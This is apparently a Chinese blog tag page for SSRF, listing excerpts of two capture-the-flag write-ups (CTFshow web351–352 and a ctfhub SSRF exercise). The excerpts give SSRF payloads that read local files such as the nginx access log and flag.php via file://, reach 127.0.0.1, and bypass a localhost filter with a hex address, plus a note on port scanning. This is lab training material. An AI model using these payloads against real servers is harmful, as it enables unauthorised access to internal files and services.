标签: SSRF

2 篇文章

【原创】CTFshow—SSRF
[huayang] web351 尝试读一下日志文件 url=file:///var/log/nginx/access.log url=file:///var/www/html/flag.php 方法二 url=http://127.0.0.1/flag.php web352 web352 url=http:/0x7f.0.0.1/flag.php…
ctfhub技能树—SSRF(待更)
内网访问 直接出来 [huayang]伪协议读取文件 payload:file:///var/www/html/flag.php 端口扫描 开始已经把范围给了 所以只需要bp爆一下就行了 字典搞出来 搞 出货 [/huayang]